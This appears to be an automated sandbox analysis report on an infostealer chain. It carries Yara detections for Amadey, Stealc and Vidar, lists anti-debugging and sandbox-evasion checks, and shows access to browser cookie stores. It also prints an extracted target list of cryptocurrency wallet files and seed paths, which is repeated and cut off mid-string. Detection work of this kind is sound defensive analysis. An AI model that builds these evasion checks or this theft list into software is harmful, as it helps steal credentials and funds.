Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	File opened: NTICE
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	File opened: SICE
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

Code function: 2_2_04DB0C09 rdtsc

2_2_04DB0C09

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_00405150 lstrlenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,LdrInitializeThunk,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

11_2_00405150

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

11_2_0041ACFA

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_00404610 VirtualProtect ?,00000004,00000100,00000000

11_2_00404610

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

11_2_004195E0

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_00419160 mov eax, dword ptr fs:[00000030h]

11_2_00419160

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

11_2_00405000

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0041C8D9 SetUnhandledExceptionFilter,	11_2_0041C8D9
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0041ACFA
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0041A718
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C67B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_6C67B66C
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C67B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_6C67B1F7
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C82AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_6C82AC62
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_00409950 SetUnhandledExceptionFilter,	12_2_00409950
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	12_2_00409930

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: bfb8bb0dc7.exe PID: 3152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bfb8bb0dc7.exe PID: 9104, type: MEMORYSTR

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

11_2_004190A0

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe "C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\d27375200a.exe "C:\Users\user\1000003002\d27375200a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingFHJDBKJKFI.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJKECAAAFH.exe"	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\F1CD.tmp\F1CE.tmp\F1CF.bat C:\Users\user\1000003002\d27375200a.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4B76.tmp\4B77.tmp\4B78.bat C:\Users\user\1000003002\d27375200a.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe "C:\Users\user\AppData\RoamingFHJDBKJKFI.exe"
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingHJKECAAAFH.exe "C:\Users\user\AppData\RoamingHJKECAAAFH.exe"

Source: explorti.exe, explorti.exe, 00000005.00000002.2286152446.0000000000FFF000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: XAProgram Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_6C67B341 cpuid

11_2_6C67B341

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

11_2_00417630

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\1000003002\d27375200a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\1000003002\d27375200a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

11_2_00417420

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA,

11_2_004172F0

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

11_2_004174D0

Source: C:\Users\user\1000003002\d27375200a.exe

Code function: 12_2_0040559A GetVersionExW,GetVersionExW,

12_2_0040559A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 4.2.explorti.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 50.2.RoamingHJKECAAAFH.exe.830000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.6SoKuOqyNh.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.RoamingFHJDBKJKFI.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.explorti.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000032.00000002.3100288040.0000000000831000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2232316189.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2245619240.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2273315501.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2245966908.00000000009F1000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2203138174.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.3316222838.0000000000CA1000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3056372409.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2286029441.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.3027185074.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2691951634.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bfb8bb0dc7.exe PID: 3152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bfb8bb0dc7.exe PID: 9104, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: bfb8bb0dc7.exe PID: 3152, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia 